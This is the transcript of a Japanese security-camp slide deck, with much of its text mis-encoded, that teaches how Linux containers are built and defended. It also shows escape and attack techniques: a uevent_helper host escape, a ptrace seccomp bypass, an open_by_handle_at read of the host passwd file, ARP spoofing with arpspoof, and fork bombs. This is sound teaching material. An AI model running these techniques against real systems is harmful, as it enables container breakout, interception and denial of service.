Upgrade to Pro — share decks privately, control downloads, hide ads and more …

コンテナの作り方、壊し方 / Container Structure and Exploita...

mrtc0
November 10, 2018

コンテナの作り方、壊し方 / Container Structure and Exploitation Method

セキュリティ・ミニキャンプ2018 in 愛媛での資料です。 #seccamp

mrtc0

November 10, 2018
Tweet

More Decks by mrtc0

Other Decks in Programming

Transcript

  1. ͍ΘΏΔԾ૝Խ ϋʔυ΢ΣΞ ϗετ04ϋΠύʔόΠβ )BSEXBSF &NVMBUJPO )BSEXBSF &NVMBUJPO )BSEXBSF &NVMBUJPO ήετ04

    ήετ04 ήετ04 ϥΠϒϥϦ ϥΠϒϥϦ ϥΠϒϥϦ ϓϩάϥϜ ϓϩάϥϜ ϓϩάϥϜ
  2. ͍ΘΏΔԾ૝Խ ϋʔυ΢ΣΞ ϗετ04ϋΠύʔόΠβ )BSEXBSF &NVMBUJPO )BSEXBSF &NVMBUJPO )BSEXBSF &NVMBUJPO ήετ04

    ήετ04 ήετ04 ϥΠϒϥϦ ϥΠϒϥϦ ϥΠϒϥϦ ϓϩάϥϜ ϓϩάϥϜ ϓϩάϥϜ
  3. ίϯςφԾ૝Խ ϋʔυ΢ΣΞ ϗετ04 -JOVY ίϯςφΤϯδϯ ίϯςφΤϯδϯ ίϯςφΤϯδϯ ϥΠϒϥϦ ϥΠϒϥϦ ϥΠϒϥϦ

    ϓϩάϥϜ ϓϩάϥϜ ϓϩάϥϜ 04ͷػೳ͸ڞ௨Ͱ࢖༻ ϗετͱಉ͡,FSOFMΛ࢖͏
  4. BPVU $ ps xf -C a.out 3262 ? S 0:00

    sshd: vagrant@pts/2 3263 pts/2 Ss 0:00 \_ -bash 3372 pts/2 S+ 0:00 \_ ./a.out
  5. BPVU $ ps xf -C a.out 3262 ? S 0:00

    sshd: vagrant@pts/2 3263 pts/2 Ss 0:00 \_ -bash 3372 pts/2 S+ 0:00 \_ ./a.out
  6. %PDLFSίϯςφͷىಈ $ docker ps -a CONTAINER ID IMAGE COMMAND 4521880cffa8

    minicamp-1 "/usr/sbin/apache2ct…" $ docker start 4521 $ curl localhost:8080 -s | grep '<title>' <title>Apache2 Ubuntu Default Page: It works</title>
  7. ϓϩηεπϦʔΛ֬ೝ $ ps auxf $ sudo apt-get install apache2 &&

    sudo systemctl start apache2  %PDLFS͕࡞ΔϓϩηεπϦʔΛݟΑ͏  ϗετͰ௚઀BQBDIFΛ্ཱͪ͛ͯΈͯϓϩηεπϦʔΛݟΑ͏
  8. -JOVY/BNFTQBDFΛ֬ೝ͢Δ $ docker ps CONTAINER ID IMAGE COMMAND 4521880cffa8 minicamp-1

    “/usr/sbin/apache2ct…" $ docker exec -ti 45 bash # ίϯςφʹʮΞλονʯ͢Δ # ip a # ίϯςφ಺෦ͷωοτϫʔΫΛ֬ೝ͢Δ # exit # ίϯςφ͔Βൈ͚ͯ $ ip a # ϗετͷωοτϫʔΫͱൺֱ͢Δ
  9. $ ip a # ϗετଆ 2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500

    qdisc pfifo_fast state UP group default qlen 1000 link/ether 02:40:c1:fa:9b:f5 brd ff:ff:ff:ff:ff:ff inet 10.0.2.15/24 brd 10.0.2.255 scope global enp0s3 valid_lft forever preferred_lft forever inet6 fe80::40:c1ff:fefa:9bf5/64 scope link valid_lft forever preferred_lft forever # ip a # Dockerίϯςφଆ 10: eth0@if11: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0 inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0 valid_lft forever preferred_lft forever
  10. $ ip a # ϗετଆ 2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500

    qdisc pfifo_fast state UP group default qlen 1000 link/ether 02:40:c1:fa:9b:f5 brd ff:ff:ff:ff:ff:ff inet 10.0.2.15/24 brd 10.0.2.255 scope global enp0s3 valid_lft forever preferred_lft forever inet6 fe80::40:c1ff:fefa:9bf5/64 scope link valid_lft forever preferred_lft forever # ip a # Dockerίϯςφଆ 10: eth0@if11: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0 inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0 valid_lft forever preferred_lft forever ίϯςφ͸ಉ͡Ϛγϯʹ͋Δϓϩηε ʹ΋͔͔ΘΒͣɺಠཱͨ͠ωοτϫʔΫ͕౰͍ͨͬͯΔ
  11. ଞͷ-JOVY/BNFTQBDF΋֬ೝ͢Δ $ docker exec -ti 45 hostname 4521880cffa8 $ hostname

    ubuntu-xenial w ϗετ໊΋ҟͳ͍ͬͯΔ͜ͱΛ֬ೝͯ͠ΈΑ͏
  12. /BNFTQBDFΛݟΔ $ ps auxf | grep -A 10 docker[d] ϗετ͔Βݟͨίϯςφͷ"QBDIFͷ1*%Λ֬ೝ͠Α͏

    $ sudo ls -l /proc/$PID/ns ҎԼͷσΟϨΫτϦΛௐ΂Δ $ sudo ls -l /proc/self/ns ϗετͷํ͸Ͳ͏ͳͷ͔ௐ΂ͯ໨EJ⒎͠Α͏
  13. $ sudo ls -l /proc/3625/ns total 0 lrwxrwxrwx 1 root

    root 0 Nov 3 03:45 cgroup -> cgroup:[4026531835] lrwxrwxrwx 1 root root 0 Nov 3 03:08 ipc -> ipc:[4026532276] lrwxrwxrwx 1 root root 0 Nov 3 03:08 mnt -> mnt:[4026532274] lrwxrwxrwx 1 root root 0 Nov 3 02:55 net -> net:[4026532279] lrwxrwxrwx 1 root root 0 Nov 3 03:08 pid -> pid:[4026532277] lrwxrwxrwx 1 root root 0 Nov 3 03:45 user -> user:[4026531837] lrwxrwxrwx 1 root root 0 Nov 3 03:08 uts -> uts:[4026532275] $ sudo ls -l /proc/self/ns total 0 lrwxrwxrwx 1 root root 0 Nov 3 03:45 cgroup -> cgroup:[4026531835] lrwxrwxrwx 1 root root 0 Nov 3 03:45 ipc -> ipc:[4026531839] lrwxrwxrwx 1 root root 0 Nov 3 03:45 mnt -> mnt:[4026531840] lrwxrwxrwx 1 root root 0 Nov 3 03:45 net -> net:[4026531957] lrwxrwxrwx 1 root root 0 Nov 3 03:45 pid -> pid:[4026531836] lrwxrwxrwx 1 root root 0 Nov 3 03:45 user -> user:[4026531837] lrwxrwxrwx 1 root root 0 Nov 3 03:45 uts -> uts:[4026531838] ໨EJ⒎͠Α͏
  14. -JOVY/BNFTQBDF ໊લۭؒ ֓ཁ 1*%໊લۭؒ 1*%ͷ෼཭ Ϛ΢ϯτ໊લۭؒ ϑΝΠϧγεςϜπϦʔͷ෼཭ *1$໊લۭؒ *1$ͷ෼཭ ωοτϫʔΫ໊લۭؒ

    ωοτϫʔΫΠϯλʔϑΣΠεͷ෼཭ 654໊લۭؒ ϗετ໊ͷ෼཭ Ϣʔβʔ໊લۭؒ 6*%(*%ͷ෼཭
  15. ίϯςφͷϝϞϦׂΓ౰ͯΛ֬ೝ ϝϞϦͷׂ౰Λ֬ೝ͠Α͏ $ CID=$(docker inspect -f '{{.ID}}' 45) $ sudo

    cat /sys/fs/cgroup/memory/docker/$CID/memory.usage_in_bytes $ sudo cat /sys/fs/cgroup/memory/docker/$CID/memory.limit_in_bytes ׂ౰ͷগͳ͍ίϯςφΛ࡞Γɺൺֱ͠Α͏ $ CID2=$(docker run --memory=8m -d minicamp-1); $ sudo cat /sys/fs/cgroup/memory/docker/$CID2/memory.usage_in_bytes $ sudo cat /sys/fs/cgroup/memory/docker/$CID2/memory.limit_in_bytes
  16. ൺֱ͠Α͏ ੍ݶͷ༗ແͰίϯςφͷॲཧ଎౓͕ҟͳΔ͜ͱΛ֬ೝ͠Α͏ $ docker exec -ti $CID bash $ docker

    exec -ti $CID2 bash wBQUHFUVQEBUFΛ࣮ߦͯ͠ΈΑ͏ ௚઀ϝϞϦ࢖༻ྔΛมߋͯ͠ڍಈ͕վળ͢Δ͜ͱΛ֬ೝ͠Α͏ $ echo '128m' | sudo tee /sys/fs/cgroup/memory/docker/$CID2/memory.limit_in_bytes $ docker exec -ti $CID2 bash root@d6a2825b878a:/# apt-get update
  17. Πϝʔδ SPPUGT Λ࡞Δ $ mkdir /tmp/minicamp $ docker export 45

    | sudo tar -xv -f - -C /tmp/minicamp/ $ ls /tmp/minicamp/ bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
  18. ઃఆϑΝΠϧΛੜ੒ $ haconiwa init first-container.haco assign new haconiwa name =

    haconiwa-4ad5ea68 assign rootfs location = /var/lib/haconiwa/4ad5ea68 create first-container.haco
  19. ઃఆΛมߋ # -*- mode: ruby -*- Haconiwa.define do |config| #

    The container name and container's hostname: config.name = "haconiwa-4ad5ea68" # The first process when invoking haconiwa run: config.init_command = "/bin/bash" # If your first process is a daemon, please explicitly daemonize by: # config.daemonize! . . . # The rootfs location on your host OS # Pathname class is useful: root = Pathname.new(“/tmp/minicamp”) config.chroot_to root
  20. ίϯςφΛىಈ $ haconiwa run first-container.haco Create lock: #<Lockfile path=/var/lock/.haconiwa-4ad5ea68.hacolock> Container

    fork success and going to wait: pid=6855 groups: cannot find name for group ID 1000 root@haconiwa-4ad5ea68:/# ps ax PID TTY STAT TIME COMMAND 1 pts/3 S 0:00 /bin/bash 8 pts/3 R+ 0:00 ps ax
  21. ·ͣ͸GPSLFYFDWFDISPPU͚ͩͰ pid = Process.fork do Dir.chroot "/tmp/minicamp/" Dir.chdir "/" Exec.execve

    ENV, "/bin/bash" end p(Process.waitpid2 pid) $ hacorb test.rb bash-4.3$ pwd / bash-4.3$ ls bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
  22. 1*%໊લۭؒΛ෼཭ Namespace.unshare(Namespace::CLONE_NEWPID) pid = Process.fork do Dir.chroot "/tmp/minicamp/" Dir.chdir "/"

    Exec.execve ENV, "/bin/bash" end $ sudo hacorb test.rb bash-4.3$ mount -t proc proc /proc bash-4.3$ ps aux
  23. DHSPVQΛઃఆ limit = “3" Namespace.unshare(Namespace::CLONE_NEWPID) pid = Process.fork do Dir.mkdir

    "/sys/fs/cgroup/pids/minicamp" rescue nil system "echo #{limit} > /sys/fs/cgroup/pids/minicamp/pids.max" system "echo #{Process.pid} > /sys/fs/cgroup/pids/minicamp/tasks" Dir.chroot "/tmp/minicamp/" Dir.chdir "/" Exec.execve ENV, "/bin/bash" end $ sudo hacorb test.rb # ( echo 'test' | cat ) # bomb () { bomb | bomb & }; bomb
  24. ίϯςφԾ૝Խ ϋʔυ΢ΣΞ ϗετ04 -JOVY ίϯςφΤϯδϯ ίϯςφΤϯδϯ ίϯςφΤϯδϯ ϥΠϒϥϦ ϥΠϒϥϦ ϥΠϒϥϦ

    ϓϩάϥϜ ϓϩάϥϜ ϓϩάϥϜ 04ͷػೳ͸ڞ௨Ͱ࢖༻ ϗετͱಉ͡,FSOFMΛ࢖͏
  25. $POUBJOFS4FDVSJUZ 04Ϧιʔεͷ෼཭ 1SPDFTT pMFTZTUFN FUDʜ wDISPPUQJWPU@SPPU w-JOVY/BNFTQBDF wTFDDPNQ w-JOVY$BQBCJMJUZ wDHSPVQT

    w4&-JOVY"QQ"SNPS ݖݶػೳͷ੍ݶ QFSNJTTJPO TZTDBMM 04Ϧιʔεͷ੍ݶ $16 .FNPSZ ΞΫηείϯτϩʔϧ ಛఆͷϑΝΠϧ΁ͷΞΫηεېࢭʣ
  26. ίϯςφΛىಈͯ͠ઃఆ $ haconiwa start sample1.haco root@sample:/# echo “export PATH=$PATH” >>

    /root/.bashrc root@sample:/# bash root@sample:/# apt-get install gcc
  27. ίϯςφ͔Βൈ͚ग़ͯ͠ΈΑ͏ $ haconiwa start sample1.haco root@sample:/# cat /root/hello.sh # ޷͖ͳΤσΟλͰॻ͖ࠐΉ

    #!/bin/sh echo “Hello, Host! ;)” > /tmp/hello.txt root@sample:/# chmod +x /root/hello.sh root@sample:/# echo “/var/lib/haconiwa/sample/root/hello.sh” > /sys/kernel/uevent_helper
  28. "QQ"SNPS deny /usr/bin/top mrwklx, # top ίϚϯυͷಡΈॻ͖࣮ߦΛېࢭ wϓϩάϥϜ୯ҐͰϑΝΠϧ΍ιέοτ΁ͷڧ੍ΞΫηε੍ޚ ."$ Λߦ͏

    wNSLXLMY͸ΞΫηεϞʔυΛද͠ɺS͸3FBE X͸XSJUF Y͸࣮ߦΛද͢ wIUUQNBOQBHFTVCVOUVDPNNBOQBHFTCJPOJDNBOBQQBSNPSE IUNM
  29. ๷͍ͰΈΑ͏ $ cat apparmor/haconiwa-test … deny /usr/bin/top mrwklx, deny @{PROC}/sysrq-trigger

    rwklx, … wIBDPOJXBUFTUϓϩϑΝΠϧΛTBNQMFίϯςφʹద༻ͯ͠ΈΑ͏
  30. ๷͍ͰΈΑ͏ $ sudo cp apparmor/haconiwa-test /etc/apparmor.d/haconiwa/ $ sudo apparmor_parser -Kr

    \ /etc/apparmor.d/haconiwa/haconiwa-test $ cat sample1.haco … config.apparmor = "haconiwa-test" … wIBDPOJXBUFTUϓϩϑΝΠϧΛTBNQMFίϯςφʹద༻ͯ͠ΈΑ͏
  31. ๷͍ͰΈΑ͏ $ haconiwa start sample1.haco root@sample1:/# top bash: /usr/bin/top: Permission

    denied root@sample1:/# echo c > /proc/sysrq-trigger bash: /proc/sysrq-trigger: Permission denied
  32. TFDDPNQΛମݧ͠Α͏ $ cat sample2.haco config.seccomp.filter(default: :allow) do |rule| rule.kill :mkdir

    # mkdir(2) Λېࢭ end $ sudo haconiwa start sample2.haco root@sample1:/# mkdir /tmp/hoge Bad system call
  33. TFDDPNQΛCZQBTTͯ͠ΈΑ͏ root@sample1:~/# ls bypass_seccomp.c root@sample1:~/# mkdir dir Bad system call

    root@sample1:~/# gcc bypass_seccomp.c root@sample1:~/# ./a.out root@sample1:~/# ls -al … drwxr-xr-x 2 root root 4096 Sep 10 12:27 dir # ࡞੒Ͱ͖ͨ
  34. QUSBDF  kill(getpid(), SIGSTOP); syscall(SYS_getpid, SYS_mkdir, "dir", 0777); if (regs.orig_rax

    == SYS_getpid) { regs.orig_rax = regs.rdi; regs.rdi = regs.rsi; regs.rsi = regs.rdx; regs.rdx = regs.r10; ptrace(PTRACE_SETREGS, pid, NULL, &regs); }
  35. έΠύϏϦςΟΛମݧ͠Α͏ $ haconiwa start sample3.haco root@sample1:/# ping 8.8.8.8 PING 8.8.8.8

    (8.8.8.8) 56(84) bytes of data. 64 bytes from 8.8.8.8: icmp_seq=1 ttl=63 time=5.54 ms ^C --- 8.8.8.8 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  36. έΠύϏϦςΟΛମݧ͠Α͏ root@sample1:/# mount /dev/sda1 /mnt/ root@sample1:/# cat /mnt/etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

    … vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash lxc-dnsmasq:x:112:117:LXC dnsmasq,,,:/var/lib/lxc:/bin/false
  37. ݖݶ͕ͳ͍ͷͰ࣮ߦෆՄೳ $ haconiwa start sample3.haco root@sample1:/# ping 8.8.8.8 ping: icmp

    open socket: Operation not permitted root@sample1:/# mount /dev/sda1 /mnt/ mount: permission denied
  38. PQFO@CZ@IBOEMF@BU int open_by_handle_at( int mount_fd, struct file_handle *handle, int flags);

    struct file_handle { unsigned int handle_bytes; /* Size of f_handle [in, out] */ int handle_type; /* Handle type [out] */ unsigned char f_handle[0]; /* File identifier */ };
  39. PQFO@CZ@IBOEMF@BU struct file_handle { unsigned int handle_bytes; /* Size of

    f_handle [in, out] */ int handle_type; /* Handle type [out] */ unsigned char f_handle[0]; /* File identifier */ }; ઌ಄όΠτʹ͸։͖͍ͨϑΝΠϧͷJOPEF൪߸
  40. PQFO@CZ@IBOEMF@BU $ stat /etc/passwd File: '/etc/passwd' Size: 1724 Blocks: 8

    IO Block: 4096 regular file Device: 801h/2049d Inode: 23125 Links: 1 struct my_file_handle h = { .handle_bytes = 8, .handle_type = 1, // 23125 = 5a 55 .f_handle = {0x55, 0x5a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00} };
  41. PQFO@CZ@IBOEMF@BU $ stat /etc/passwd File: '/etc/passwd' Size: 1724 Blocks: 8

    IO Block: 4096 regular file Device: 801h/2049d Inode: 57824 Links: 1 $ haconiwa start sample4.c root@sample1:/# vim read_passwd.c // Change ex) 57824= e1 e0 .f_handle = {0xe0, 0xe1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00} };
  42. PQFO@CZ@IBOEMF@BU root@sample1:/# gcc read_passwd.c root@sample1:/# ./a.out root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin …

    vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash lxc-dnsmasq:x:112:117:LXC dnsmasq,,,:/var/lib/lxc:/bin/false
  43. #SJEHF/FUXPSL $ ip addr show dev lxdbr0 4: lxdbr0: <BROADCAST,MULTICAST,UP,LOWER_UP>

    mtu 1500 qdisc noqueue state UP group default qlen 1000 link/ether fe:20:6c:0f:5b:66 brd ff:ff:ff:ff:ff:ff inet 10.152.207.1/24 scope global lxdbr0 valid_lft forever preferred_lft forever inet6 fd2e:8281:6de5:9841::1/64 scope global valid_lft forever preferred_lft forever inet6 fe80::281a:c0ff:fed1:4b28/64 scope link valid_lft forever preferred_lft forever
  44. "315BCMF vagrant@ubuntu-xenial:~$ lxc list attacker | RUNNING | 10.128.193.110 (eth0)

    victim | RUNNING | 10.128.193.231 (eth0) vagrant@ubuntu-xenial:~$ arp -a ? (10.128.193.231) at 00:16:3e:6a:55:5d [ether] on lxdbr0 # attacker ? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3 ? (10.128.193.110) at 00:16:3e:1d:73:72 [ether] on lxdbr0 # victim ? (10.0.2.3) at 52:54:00:12:35:03 [ether] on enp0s3
  45. ίϯςφͱૄ௨͕औΕΔ͜ͱΛ֬ೝ vagrant@ubuntu-xenial:~$ lxc exec attacker bash root@test1:~# ping 10.128.193.231 #

    victim ip PING 10.128.193.231 (10.128.193.231) 56(84) bytes of data. 64 bytes from 10.128.193.231: icmp_seq=1 ttl=64 time=0.070 ms ^C --- 10.128.193.231 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.070/0.070/0.070/0.000 ms
  46. "314QPPpOH root@test1:~# arpspoof -t 10.128.193.231 10.128.193.1 &> /dev/null & [1]

    1619 root@test1:~# arpspoof -t 10.128.193.1 10.128.193.231 &> /dev/null & [2] 1620
  47. "315BCMF vagrant@ubuntu-xenial:~$ arp -a ? (10.128.193.231) at 00:16:3e:1d:73:72 [ether] on

    lxdbr0 ? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3 ? (10.128.193.110) at 00:16:3e:1d:73:72 [ether] on lxdbr0 ? (10.0.2.3) at 52:54:00:12:35:03 [ether] on enp0s3
  48. औಘͨ͠ύέοτΛݟͯΈΔ $ lxc file pull attacker/root/test.pcap ./ $ tcpdump -X

    tcp port 80 -r test.pcap 0x0000: 4500 0082 2126 4000 3f06 8267 0a80 c101 E...!&@.?..g.... 0x0010: 0a80 c1e7 8f28 0050 ebdb f6f0 89c2 03be .....(.P........ 0x0020: 8018 00e5 985d 0000 0101 080a 001b d7cb .....].......... 0x0030: 001b d7cb 4745 5420 2f20 4854 5450 2f31 ....GET./.HTTP/1 0x0040: 2e31 0d0a 486f 7374 3a20 3130 2e31 3238 .1..Host:.10.128 0x0050: 2e31 3933 2e32 3331 0d0a 5573 6572 2d41 .193.231..User-A 0x0060: 6765 6e74 3a20 6375 726c 2f37 2e34 372e gent:.curl/7.47. 0x0070: 300d 0a41 6363 6570 743a 202a 2f2a 0d0a 0..Accept:.*/*.. 0x0080: 0d0a ..
  49. ENFTHͷόοϑΝϦϯάݺͼग़͠ͱফڈ root@sample1:/# dmesg [ 311.470895] EXT4-fs (sda1): error count since

    last fsck: 28 [ 311.470928] EXT4-fs (sda1): initial error at time 1537860516: htree_dirblock_to_tree:986: inode 542086: block 1069691 [ 311.470944] EXT4-fs (sda1): last error at time 1537928843: htree_dirblock_to_tree:986: inode 278756: block 531449 … root@06399a7a8814:/# dmesg -C root@06399a7a8814:/# dmesg
  50. OFHBUJWFEFOUSZͷେྔੜ੒ root@sample1:/# perl -e 'stat("/$_") for 1..100000000’ vagrant@ubuntu-xenial:~$ sudo slabtop

    Active / Total Objects (% used) : 4172542 / 4182249 (99.8%) Active / Total Slabs (% used) : 197606 / 197606 (100.0%) Active / Total Caches (% used) : 78 / 122 (63.9%) Active / Total Size (% used) : 790487.34K / 794654.96K (99.5%) Minimum / Average / Maximum Object : 0.01K / 0.19K / 8.00K OBJS ACTIVE USE OBJ SIZE SLABS OBJ/SLAB CACHE SIZE NAME 4050564 4050564 100% 0.19K 192884 21 771536K dentry
  51. GPSLCPNC $ :(){ :|: & };: $ for i in

    {1..9999}; do sleep infinity & done